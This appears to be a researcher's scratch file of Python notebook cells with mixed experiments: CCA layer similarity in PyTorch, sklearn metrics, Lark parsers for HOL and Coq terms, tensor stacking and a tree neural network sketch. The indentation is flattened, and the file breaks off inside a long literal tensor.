days = (secs_per_it * total_its) / (60 * 60 * 24)
print(days)
print(f'time in days for resnet18_rfs with 1 inner steps')
sect_per_it_2_days(4.76, 100000)
print(f'time in days for resnet18_rfs with 1 inner steps')
sect_per_it_2_days(8.19, 100000)
print(f'time in days for resnet18_rfs with 4 inner steps')
sect_per_it_2_days(16.11, 100000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(46.26, 100000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(3.47, 100000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(2.7, 100000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(5.7, 100000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(46.26, 20000)
print(f'time in days for synthetic with 1 inner steps')
sect_per_it_2_days(2.7, 20_000)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl2, "fc1_l1")
mdl.eval()
mdl2.eval()
#
num_samples_per_task = 100
lb, ub = -1, 1
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
with torch.no_grad():
mdl(x)
mdl2(x)
hook1.distance(hook2, size=8)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU())
]))
# with torch.no_grad():
# mdl.fc1_l1.weight.fill_(2.0)
# mdl.fc1_l1.bias.fill_(2.0)
#
hook1 = SimilarityHook(mdl, "fc1_l1")
hook2 = SimilarityHook(mdl, "fc1_l1")
mdl.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 100
size = 8
# start CCA comparision
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
mdl(x)
hook1.distance(hook2, size=size)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
# get init
# path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
# ckpt = torch.load(path_2_init)
# mdl = ckpt['f']
#
Din, Dout = 1, 1
mdl1 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
with torch.no_grad():
mu = torch.zeros(Din)
# std = 1.25e-2
std = 10
noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
# mdl2.fc1_l1.weight.fill_(50.0)
# mdl2.fc1_l1.bias.fill_(50.0)
mdl2.fc1_l1.weight += noise
mdl2.fc1_l1.bias += noise
#
hook1 = SimilarityHook(mdl1, "fc2_l2")
hook2 = SimilarityHook(mdl2, "fc2_l2")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparision
lb, ub = -1, 1
with torch.no_grad():
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
a = ("John", "Charles", "Mike")
b = ("Jenny", "Christy", "Monica", "Vicky")
lst = zip(a, b)
lst = list(lst)
print(lst)
# %%
lst = [
[1, 2, 3],
[4, 5, 6],
[7, 8, 9]
]
lst = zip(*lst)
lst = list(lst)
print(lst)
import numpy as np
average_per_layer = [np.average(l) for l in lst]
average_total = np.average(average_per_layer)
print(average_per_layer)
print(average_total)
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
import copy
# get init
path_2_init = Path('~/data/logs/logs_Nov17_13-57-11_jobid_416472.iam-pbs/ckpt_file.pt').expanduser()
ckpt = torch.load(path_2_init)
mdl = ckpt['f']
mdl1 = mdl
# mdl2 = copy.deepcopy(mdl1)
mdl2 = copy.deepcopy(mdl)
#
Din, Dout = 1, 1
# mdl1 = nn.Sequential(OrderedDict([
# ('fc1_l1', nn.Linear(in_features=1, out_features=300, bias=True)),
# ('bn1_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu1', nn.ReLU()),
# ('fc2_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn2_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu2', nn.ReLU()),
# ('fc3_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn3_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu3', nn.ReLU()),
# ('fc4_final_l2', nn.Linear(in_features=300, out_features=1, bias=True))
# ]))
# mdl2 = nn.Sequential(OrderedDict([
# ('fc1_l1', nn.Linear(in_features=1, out_features=300, bias=True)),
# ('bn1_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu1', nn.ReLU()),
# ('fc2_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn2_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu2', nn.ReLU()),
# ('fc3_l1', nn.Linear(in_features=300, out_features=300, bias=True)),
# ('bn3_l1', nn.BatchNorm1d(300, eps=1e-05, momentum=0.1, affine=True, track_running_stats=False)),
# ('relu3', nn.ReLU()),
# ('fc4_final_l2', nn.Linear(in_features=300, out_features=1, bias=True))
# ]))
# with torch.no_grad():
# mu = torch.zeros(Din)
# # std = 1.25e-2
# std = 10
# noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
# # mdl2.fc1_l1.weight.fill_(50.0)
# # mdl2.fc1_l1.bias.fill_(50.0)
# mdl2.fc1_l1.weight += noise
# mdl2.fc1_l1.bias += noise
#
# hook1 = SimilarityHook(mdl1, "fc1_l1")
# hook2 = SimilarityHook(mdl2, "fc1_l1")
hook1 = SimilarityHook(mdl1, "fc2_l1")
hook2 = SimilarityHook(mdl2, "fc2_l1")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparision
lb, ub = -1, 1
# with torch.no_grad():
# for _ in range(iters):
# # x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
# y1 = mdl1(x)
# y2 = mdl2(x)
# print((y1-y2).norm(2))
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
from sklearn.metrics import explained_variance_score
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
explained_variance_score(y_true, y_pred)
y_true = [[0.5, 1], [-1, 1], [7, -6]]
y_pred = [[0, 2], [-1, 2], [8, -5]]
ev = explained_variance_score(y_true, y_pred, multioutput='uniform_average')
ev_raw = explained_variance_score(y_true, y_pred, multioutput='raw_values')
ev_weighted = explained_variance_score(y_true, y_pred, multioutput='variance_weighted')
print(ev_raw)
print(ev_weighted)
# %%
# import sklearn.metrics.mean_squared_error as mse, not possible because is a funciton is my guess?
# https://stackoverflow.com/questions/40823418/why-cant-i-import-from-a-module-alias
from sklearn.metrics import mean_squared_error
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
mean_squared_error(y_true, y_pred)
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
mean_squared_error(y_true, y_pred, squared=False)
y_true = [[0.5, 1], [-1, 1], [7, -6]]
y_pred = [[0, 2], [-1, 2], [8, -5]]
mean_squared_error(y_true, y_pred)
mean_squared_error(y_true, y_pred, squared=False)
mean_squared_error(y_true, y_pred, multioutput='raw_values')
mean_squared_error(y_true, y_pred, multioutput=[0.3, 0.7])
# %%
import torch
import torch.nn as nn
from anatome import SimilarityHook
from collections import OrderedDict
from pathlib import Path
import copy
#
Din, Dout = 1, 1
mdl1 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
mdl2 = nn.Sequential(OrderedDict([
('fc1_l1', nn.Linear(Din, Dout)),
('out', nn.SELU()),
('fc2_l2', nn.Linear(Din, Dout)),
]))
if torch.cuda.is_available():
mdl1 = mdl1.cuda()
mdl2 = mdl2.cuda()
with torch.no_grad():
mu = torch.zeros(Din)
# std = 1.25e-2
std = 10
noise = torch.distributions.normal.Normal(loc=mu, scale=std).sample()
# mdl2.fc1_l1.weight.fill_(50.0)
# mdl2.fc1_l1.bias.fill_(50.0)
mdl2.fc1_l1.weight += noise
mdl2.fc1_l1.bias += noise
hook1 = SimilarityHook(mdl1, "fc2_l1")
hook2 = SimilarityHook(mdl2, "fc2_l1")
mdl1.eval()
mdl2.eval()
# params for doing "good" CCA
iters = 10
num_samples_per_task = 500
size = 8
# start CCA comparision
lb, ub = -1, 1
for _ in range(iters):
x = torch.torch.distributions.Uniform(low=-1, high=1).sample((15, 1))
if torch.cuda.is_available():
x = x.cuda()
# x = torch.torch.distributions.Uniform(low=lb, high=ub).sample((num_samples_per_task, Din))
y1 = mdl1(x)
y2 = mdl2(x)
print((y1 - y2).norm(2))
dist = hook1.distance(hook2, size=size)
print(f'dist={dist}')
# %%
# other cca library for layer https://discuss.pytorch.org/t/what-is-a-good-cca-cka-library-for-pytorch-that-works-ideally-with-gpu/104889
# https://github.com/jameschapman19/cca_zoo
# %%
# walrus operator
# https://therenegadecoder.com/code/the-controversy-behind-the-walrus-operator-in-python/
(x := 1)
print(x)
#
from pathlib import Path
path = Path('~/data/coq-hott-dataset-serpi/contrib/HoTTBook.feat').expanduser()
with open(path) as f:
while line := f.read():
print(line)
#
# [result for x in values if (result := func(x)) < 10]
#
# if result := do_something():
# do_more(result)
[y := f(x), y ** 2, y ** 3]
# %%
from lark import Lark
#
grammar = '''start: WORD "," WORD "!"
%import common.WORD // imports from terminal library
%ignore " " // Disregard spaces in text
'''
# grates parser
l = Lark(grammar)
print(l.parse("Hello, World!"))
# %%
from lark import Lark
import lark
grammar = """
start: term
term: apply
| const
| free
| var
| bound
| abs
apply: "(apply " term " " term ")"
const: "(const " MYSTR ")"
free: "(free " MYSTR ")"
var: "(var " MYSTR ")"
bound: "(bound " MYSTR ")"
abs: "(abs " MYSTR " " term ")"
MYSTR: LETTER (LETTER | "." | "_" | DIGIT)*
%import common.WORD
%import common.DIGIT
%import common.LETTER
%ignore " "
"""
parser = Lark(grammar)
tree1 = parser.parse(
"(apply (const HOL.Trueprop) (apply (apply (const HOL.implies) (apply (apply (const HOL.conj) (free A)) (free B))) (apply (apply (const HOL.conj) (free B)) (free A))))")
print(parser.parse(
"(apply (const HOL.Trueprop) (apply (apply (const HOL.implies) (apply (apply (const HOL.conj) (free A)) (free B))) (apply (apply (const HOL.conj) (free B)) (free A))))"))
print(tree1.pretty())
class IncreaseAllNumbers(lark.Transformer):
def _call_userfunc(self, tree, children):
# to do I will need to do something to get the type of variables
# because the variables' types are not attached yet
return
def _call_userfunc_token(self, c):
print(c)
IncreaseAllNumbers(visit_tokens=True).transform(tree1)
# %%
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
word_to_ix = {"hello": 0, "world": 1}
embeds = nn.Embedding(2, 5) # 2 words in vocab, 5 dimensional embeddings
print(type(embeds))
lookup_tensor = torch.tensor([word_to_ix["hello"]], dtype=torch.long)
hello_embed = embeds(lookup_tensor)
print(hello_embed)
# %%
my_set = {1, 2, 3}
print(my_set)
print(type(my_set))
print(len(my_set))
print(1 in my_set)
print(my_set.pop())
print(my_set.pop())
print(my_set.pop())
# %%
from collections import defaultdict
lst = [('a', 1), ('b', 2), ('a', 0)]
# collect values for a in one place, collect values for b in another
d = defaultdict(list) # creates a default dict of value to empty list
for k, v in lst:
d[k].append(v)
print(d)
print(dict(d))
lst2 = d.items()
print(sorted(lst2))
# %%
import numpy as np
x = np.random.randn(1, 10)
xx = np.array([x, x]).reshape([])
print(xx.shape)
c = np.cov(xx)
# %%
import numpy as np
x = np.random.randn(2, 10)
print(x.shape)
c = np.cov(x)
print(c)
print(c.shape)
# %%
import torch
import torch.nn as nn
from collections import OrderedDict
params = OrderedDict([
('fc1', nn.Linear(in_features=4, out_features=4)),
('ReLU1', nn.ReLU()),
('fc2', nn.Linear(in_features=4, out_features=4)),
('ReLU2', nn.ReLU()),
('fc3', nn.Linear(in_features=4, out_features=1)),
])
mdl = nn.Sequential(params)
for name, m in mdl.named_children():
print(f'{name}, {m}')
print()
# for m in mdl.modules():
# print(m)
#
# print()
#
# for name, m in mdl.named_modules():
# print(name)
# print(m)
#
# print()
#
# for name, m in mdl.named_children():
# print(name)
# print(m)
# %%
# Meaning of dimension in pytorch operations: https://discuss.pytorch.org/t/whats-different-between-dim-1-and-dim-0/61094/5
# input tensor of dimensions B x C, B = number of batches, C = number of classes.
B = 8
C = 3
inputs = torch.rand(size=(B, C))
soft_dim0 = torch.softmax(inputs, dim=0)
soft_dim1 = torch.softmax(inputs, dim=1)
print('**** INPUTS ****')
print(inputs)
print(inputs.size())
print('**** SOFTMAX DIM=0 ****')
print(soft_dim0)
print(f'soft_dim0[0, :].sum()={soft_dim0[0, :].sum()}')
print(f'soft_dim0[:, 0].sum()={soft_dim0[:, 0].sum()}')
print(soft_dim0.size())
# print('**** SOFTMAX DIM=1 ****')
# print(soft_dim1)
# %%
# cosine similarity
import torch.nn as nn
dim = 1 # apply cosine accross the second dimension/feature dimension
cos = nn.CosineSimilarity(dim=dim) # eps defaults to 1e-8 for numerical stability
k = 4 # number of examples
d = 8 # dimension
x1 = torch.randn(k, d)
x2 = x1 * 3
print(f'x1 = {x1.size()}')
cos_similarity_tensor = cos(x1, x2)
print(cos_similarity_tensor)
print(cos_similarity_tensor.size())
# %%
import torch.nn as nn
def ned(x1, x2, dim=1, eps=1e-8):
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
return ned_2 ** 0.5
def nes(x1, x2, dim=1, eps=1e-8):
return 1 - ned(x1, x2, dim, eps)
dim = 1 # apply cosine accross the second dimension/feature dimension
k = 4 # number of examples
d = 8 # dimension of feature space
x1 = torch.randn(k, d)
x2 = x1 * 3
print(f'x1 = {x1.size()}')
ned_tensor = ned(x1, x2, dim=dim)
print(ned_tensor)
print(ned_tensor.size())
print(nes(x1, x2, dim=dim))
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(3, 1)
xs = [x, x]
# xs = torch.tensor(xs)
xs = torch.as_tensor(xs)
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(4)
xs = [x.numpy(), x.numpy()]
# xs = torch.tensor(xs)
xs = torch.as_tensor(xs)
print(xs)
print(xs.size())
# %%
import torch
# trying to convert a list of tensors to a torch.tensor
x = torch.randn(4)
xs = [x.numpy(), x.numpy(), x.numpy()]
xs = [xs, xs]
# xs = torch.tensor(xs)
xs = torch.as_tensor(xs)
print(xs)
print(xs.size())
# %%
# You could use torch.cat or torch.stack to create a tensor from the list.
import torch
x = torch.randn(4)
xs = [x, x]
xs = torch.cat(xs)
print(xs.size())
# xs = torch.stack(xs)
# print(xs.size())
# %%
import torch
# stack vs cat
# cat "extends" a list in the given dimension e.g. adds more rows or columns
x = torch.randn(2, 3)
print(f'{x.size()}')
# add more rows (thus increasing the dimensionality of the column space to 2 -> 6)
xnew_from_cat = torch.cat((x, x, x), 0)
print(f'{xnew_from_cat.size()}')
# add more columns (thus increasing the dimensionality of the row space to 3 -> 9)
xnew_from_cat = torch.cat((x, x, x), 1)
print(f'{xnew_from_cat.size()}')
print()
# stack serves the same role as append in lists. i.e. it doesn't change the original
# vector space but instead adds a new index to the new tensor, so you retain the ability
# get the original tensor you added to the list by indexing in the new dimension
xnew_from_stack = torch.stack((x, x, x, x), 0)
print(f'{xnew_from_stack.size()}')
xnew_from_stack = torch.stack((x, x, x, x), 1)
print(f'{xnew_from_stack.size()}')
xnew_from_stack = torch.stack((x, x, x, x), 2)
print(f'{xnew_from_stack.size()}')
# default appends at the from
xnew_from_stack = torch.stack((x, x, x, x))
print(f'{xnew_from_stack.size()}')
print('I like to think of xnew_from_stack as a \"tensor list\" that you can pop from the front')
print()
lst = []
print(f'{x.size()}')
for i in range(10):
x += i # say we do something with x at iteration i
lst.append(x)
# lstt = torch.stack([x for _ in range(10)])
lstt = torch.stack(lst)
print(lstt.size())
print()
# lst = []
# print(f'{x.size()}')
# for i in range(10):
# x += i # say we do something with x at iteration i
# for j in range(11):
# x += j
# lstx
# lst.append(x)
# # lstt = torch.stack([x for _ in range(10)])
# lstt = torch.stack(lst)
# print(lstt.size())
# %%
import torch
# A class that represents an individual node in a
# Binary Tree
class Node:
def __init__(self, val):
self.left = None
self.right = None
self.val = val
# A function to do postorder tree traversal
def print_postorder(root):
# don't do anything if root is Nothing, else traverse according to PostOrder traversal
# (i.e. left & right until done then print)
if root: # if it's None it's False so does nothing, it's true if it's not None
# First post order print left child (if None this does nothing and then does Post order of the right)
print_postorder(root.left)
# Once right has been done for current node do Post order of right tree (if root.right is None do nothing)
print_postorder(root.right)
# After everything has been printed in post order way, then you can now print the data of current node
print(root.val)
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
print("\nPostorder traversal of binary tree is")
print_postorder(root)
# %%
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def forward(self, children_embeddings):
# just do a sum of children and current value
return self.val + sum(children_embeddings)
# create top
root = Node(1)
# create left
left = Node(2)
left.children = [Node(4), Node(5)]
# create right
right = Node(3)
# create entire tree
root.children = [left, right]
# A function to do postorder tree traversal
def compute_embedding_bottom_up(root, verbose=False):
'''
What we want is to compute all subtrees
@param root:
@return:
'''
# don't do anything if root is Nothing, else traverse according to PostOrder traversal
if root: # if it's None it's False so does nothing, it's true if it's not None
# Traverse the entire childrens in post order before continuing
children_embedings = []
for children in root.children:
child_embeding = compute_embedding_bottom_up(children, verbose)
children_embedings.append(child_embeding)
# After everything has been computed in post order, compute the current embedding
root_embedding = root.forward(children_embedings)
print(root_embedding) if verbose else None
return root_embedding
# should print 4 5 11 3 15
compute_embedding_bottom_up(root, verbose=True)
# %%
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def forward(self, children_embeddings):
# just do a sum of children and current value
return self.val + sum(children_embeddings)
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
def embed():
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
word_to_ix = {"hello": 0, "world": 1}
embeds = nn.Embedding(2, 5) # 2 words in vocab, 5 dimensional embeddings
print(type(embeds))
lookup_tensor = torch.tensor([word_to_ix["hello"]], dtype=torch.long)
hello_embed = embeds(lookup_tensor)
print(hello_embed)
# %%
import torch
x = torch.randn(5, 1)
print(x.size())
xs = torch.stack([x, x, x])
print(xs)
print(xs.size())
mean_xs = xs.mean(dim=0)
print(mean_xs)
# %%
'''
Need:
- 1 vocabulary of green terms
- 2 vocabulary of black terms (coq/gallina constructs)
- 3 ast trees so we can traverse them (postorder ideally)
- 4 traversal code for generating a embedding using tree_nn
'''
# import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
# import torch.nn.functional as F
# import torch.optim as optim
# from torch.utils.data import DataLoader
# from torch.utils import data
class TreeNN(torch.nn.Module):
def __init__(self, vocab, embed_dim, constructors):
"""
vocab = [idx:word]
"""
super().__init__()
# artity 0 are embeddings/vectors
self.vocab = vocab
self.embed_dim = embed_dim
self.vocab_2_idx = {word: idx for idx, word in enumerate(vocab)} # e.g. {"hello": 0, "world": 1}
self.embeds = nn.Embedding(len(self.vocab), embed_dim) # V words in vocab, D size embedding
# arity k are FNN
self.constructors = constructors
self.cons_2_fnn = {}
for cons in self.constructors:
fnn = self.get_cons_fnn()
self.cons_2_fnn[cons] = fnn
def forward(self, asts):
"""compute embeddings bottom up, so all the children of the ast have to be computed first"""
# ast = asts[0]
# embeds = [self.compute_embedding_bottom_up(ast) for ast in asts]
# return embeds
ast = asts
return self.compute_embedding_bottom_up(ast)
def compute_embedding_bottom_up(self, ast):
children_embeddings = []
for child in ast.children:
if child in self.vocab:
lookup_tensor = torch.tensor([self.vocab_2_idx[child]], dtype=torch.long)
child_embed = self.embeds(lookup_tensor)
else:
child_embed = self.compute_embedding_bottom_up(child)
children_embeddings.append(child_embed)
embed = torch.stack(children_embeddings, dim=0).mean(dim=0)
cons_fnn = self.cons_2_fnn[ast.val]
return cons_fnn(embed)
def get_cons_fnn(self):
# TODO improve, check if arity is variable or fixed, what NN to choose?
fnn = nn.Sequential(OrderedDict([
('fc0', nn.Linear(in_features=self.embed_dim, out_features=self.embed_dim)),
('SeLU0', nn.SELU()),
('fc1', nn.Linear(in_features=self.embed_dim, out_features=self.embed_dim))
]))
return fnn
class Node:
"""Node class for general trees"""
def __init__(self, val):
self.children = []
self.val = val # value of current node
def __repr__(self):
self.print_post_order()
return ''
def print_post_order(self):
"""print all the children first then the current node last"""
for child in self.children:
if type(child) is str:
print(child)
else:
child.print_post_order()
print(self.val)
class JsonToAst:
def __init__(self):
self.base_cases = {"Ind", "Var"}
def generate_ast(self, term):
'''
Assumption is that at term is of the form:
term = {
cons: [...,term,...]
}
base case:
term = {
cons: [...,string,...]
}
'''
for cons, args in term.items():
root = Node(cons)
if cons in self.base_cases:
args = args[0] # TODO ask lasse what to do here
root.children = [args]
else:
for term in args:
child = self.generate_ast(term)
root.children.append(child)
return root
####
def test():
json2ast = JsonToAst()
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
ast = json2ast.generate_ast(term)
print(ast)
#
vocab = ["R", "A", "Coq.Relations.Relation_Operators.clos_refl_trans"]
constructors = ["App", "Ind", "Var"]
#
embed_dim = 4
term_encoder = TreeNN(vocab, embed_dim, constructors)
term_embedding = term_encoder(ast)
print(term_embedding)
print(term_embedding.size())
if __name__ == '__main__':
test()
print('done\a')
# %%
import torch
x = torch.randn(4, 3, 2)
xs = torch.cat([x, x, x], dim=0)
print(xs.size())
xs = torch.cat([x, x, x], dim=1)
print(xs.size())
xs = torch.cat([x, x, x], dim=2)
print(xs.size())
# %%
term = {
"App": [
{
"Ind": [
"Coq.Relations.Relation_Operators.clos_refl_trans",
"0"
]
},
{
"Var": [
"A"
]
},
{
"Var": [
"R"
]
}
]
}
print(term.keys())
keys = list(term.keys())
print(keys[0])
# %%
# python conditional ternery operator
x = 'true' if True else 'false'
# %%
import torch
x = torch.randn([5, 12])
print(x.mean())
print(x.mean().size())
y = torch.tensor(x)
print(y.size())
# %%
# https://discuss.pytorch.org/t/identity-element-for-stack-operator-torch-stack-emtpty-x-x-empty-tensor-exists/111459
import torch
empty = torch.tensor([])
x = torch.randn(3, 5, 7)
print(torch.cat([empty, x], dim=0).size())
print(torch.stack([empty, x], dim=0).size())
# %%
import torch
x = torch.randn(5, 4)
for layer in range(x.size(1)):
print(f'{layer=}')
# %%
# selecting indices arbitrarily i.e. x[*,indicies,*] were * denotes that the rest of the layers are kept the same
# but for only the last 3 layers [T, L] -> [1]
x = torch.randn(5, 4)
# compute average of first 3 layer
L = x.size(1)
indices = torch.tensor(range(L - 1))
xx = x.index_select(dim=1, index=indices)
print(f'{x=}')
print(f'{xx=}')
print(xx.size())
# %%
import torch
def ned_torch(x1, x2, dim=1, eps=1e-4):
"""
Normalized eucledian distance in pytorch.
https://discuss.pytorch.org/t/how-does-one-compute-the-normalized-euclidean-distance-similarity-in-a-numerically-stable-way-in-a-vectorized-way-in-pytorch/110829
https://stats.stackexchange.com/questions/136232/definition-of-normalized-euclidean-distance/498753?noredirect=1#comment937825_498753
:param x1:
:param x2:
:param dim:
:param eps:
:return:
"""
ned_2 = 0.5 * ((x1 - x2).var(dim=dim) / (x1.var(dim=dim) + x2.var(dim=dim) + eps))
return ned_2 ** 0.5
out1 = torch.tensor([[-3.6291e-01],
[-1.7674e+00],
[-2.1817e+00],
[-2.0127e+00],
[-1.6210e+00],
[-7.1149e-01],
[-8.0512e-01],
[-3.3430e-01],
[-6.6400e-01],
[-8.5222e-01],
[-1.1699e+00],
[-8.9726e-01],
[-7.2273e-02],
[-4.6621e-01],
[-1.7938e+00],
[-2.1175e+00],
[-1.2470e+00],
[-1.5756e-01],
[-6.4363e-01],
[-6.0576e-01],
[-1.6676e+00],
[-1.9971e+00],
[-5.9432e-01],
[-3.4780e-01],
[-6.0348e-01],
[-1.7820e+00],
[-2.2057e-01],
[-3.8268e-02],
[-1.5633e+00],
[-3.5840e-01],
[-5.7379e-02],
[-2.5210e-01],
[-1.9601e+00],
[-3.7318e-01],
[1.2341e-02],
[-2.2946e+00],
[-5.3198e-01],
[-2.3140e+00],
[-1.6823e+00],
[-4.7436e-01],
[-2.6047e-01],
[-2.1642e+00],
[-4.7522e-01],
[-5.7305e-01],
[2.8821e-01],
[-2.7846e-01],
[-2.5561e-01],
[-2.2448e+00],
[-1.1109e-02],
[-1.6171e+00],
[-2.3253e+00],
[-1.8158e+00],
[-1.5101e+00],
[1.1949e-01],
[-1.2281e+00],
[-4.2565e-01],
[-1.0244e+00],
[-2.0581e+00],
[-1.0552e+00],
[2.5954e-01],
[2.7600e-01],
[-1.2441e+00],
[2.5143e-01],
[-1.9237e+00],
[-2.0799e+00],
[-2.0188e+00],
[-1.2017e-01],
[-2.0858e+00],
[-1.4656e+00],
[-2.4549e-01],
[-2.3728e+00],
[-8.0225e-01],
[-4.2496e-01],
[-8.0095e-01],
[4.3450e-01],
[3.3060e-01],
[-2.1804e+00],
[-1.8725e+00],
[-1.2165e+00],
[-1.9400e+00],
[-2.2042e+00],
[-1.8880e+00],
[-1.2850e+00],
[1.2322e-01],
[-4.6162e-01],
[-8.0890e-01],
[-7.8389e-01],
[-2.1397e+00],
[4.1263e-01],
[-2.2107e+00],
[2.4144e-01],
[-3.8620e-01],
[-2.1676e+00],
[3.2484e-02],
[-1.6298e+00],
[-1.6220e+00],
[-1.3770e+00],
[-2.1185e+00],
[-1.1192e+00],
[-1.3630e+00],
[-4.5632e-01],
[-1.8549e+00],
[3.4460e-01],
[-2.3489e-01],
[-2.1207e+00],
[-7.0951e-01],
[2.8363e-01],
[-1.1481e+00],
[-5.5500e-01],
[-1.9301e+00],
[-1.2247e+00],
[-5.3754e-01],
[-5.6930e-01],
[2.5710e-01],
[-1.5921e+00],
[2.5347e-01],
[1.0652e-01],
[-1.1256e+00],
[-1.4893e+00],
[4.2699e-01],
[-9.1180e-01],
[-9.7470e-01],
[-1.1939e+00],
[3.5195e-01],
[-2.1075e+00],
[-1.5541e-01],
[-2.3053e+00],
[-2.2581e+00],
[-1.4817e+00],
[-4.7145e-01],
[1.5247e-01],
[7.7248e-02],
[-2.1716e+00],
[-4.0977e-01],
[-7.6577e-01],
[2.2840e-01],
[-1.9727e+00],
[-1.6670e+00],
[-1.7057e+00],
[-2.3080e+00],
[-4.0681e-01],
[1.0423e-03],
[-1.5651e+00],
[-5.2567e-01],
[-1.3016e+00],
[-1.6186e+00],
[-1.5546e+00],
[-1.7983e+00],
[1.1193e-01],
[-1.0648e+00]])
out2 = torch.tensor([[-0.2625],
[0.5472],
[0.7860],
[0.6886],
[0.4628],
[-0.0615],
[-0.0075],
[-0.2790],
[-0.0889],
[0.0196],
[0.2027],
[0.0456],
[-0.4300],
[-0.2029],
[0.5624],
[0.7491],
[0.2472],
[-0.3808],
[-0.1006],
[-0.1225],
[0.4897],
[0.6796],
[-0.1291],
[-0.2712],
[-0.1238],
[0.5556],
[-0.3445],
[-0.4496],
[0.4295],
[-0.2651],
[-0.4386],
[-0.3263],
[0.6583],
[-0.2565],
[-0.4788],
[0.8512],
[-0.1650],
[0.8623],
[0.4981],
[-0.1982],
[-0.3215],
[0.7760],
[-0.1977],
[-0.1413],
[-0.6378],
[-0.3111],
[-0.3243],
[0.8224],
[-0.4653],
[0.4606],
[0.8688],
[0.5751],
[0.3989],
[-0.5406],
[0.2363],
[-0.2263],
[0.1189],
[0.7148],
[0.1367],
[-0.6213],
